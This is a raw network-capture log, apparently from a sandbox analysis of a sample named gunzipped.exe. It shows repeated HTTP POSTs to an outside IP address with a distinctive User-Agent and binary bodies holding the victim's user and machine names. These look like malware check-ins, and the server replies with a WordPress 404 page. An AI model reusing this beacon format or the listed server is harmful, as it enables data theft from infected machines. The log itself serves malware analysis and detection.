                          Apr 17, 2024 03:18:09.742176056 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:09.742213964 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:09.742253065 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:09.742295980 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:09.742336035 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:09.742374897 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:09.742440939 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:09.742480040 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:09.742527008 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          51192.168.2.549765136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:10.084964991 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:10.288512945 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:11.264024019 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:10 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:11.264091969 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:11.264163971 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:11.264202118 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:11.264245033 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:11.264283895 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:11.264322042 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:11.264384985 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:11.264424086 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:11.264467001 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          52192.168.2.549766136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:11.616139889 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:11.819884062 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:12.751744986 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:11 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:12.751811028 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:12.751847982 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:12.751885891 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:12.751926899 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
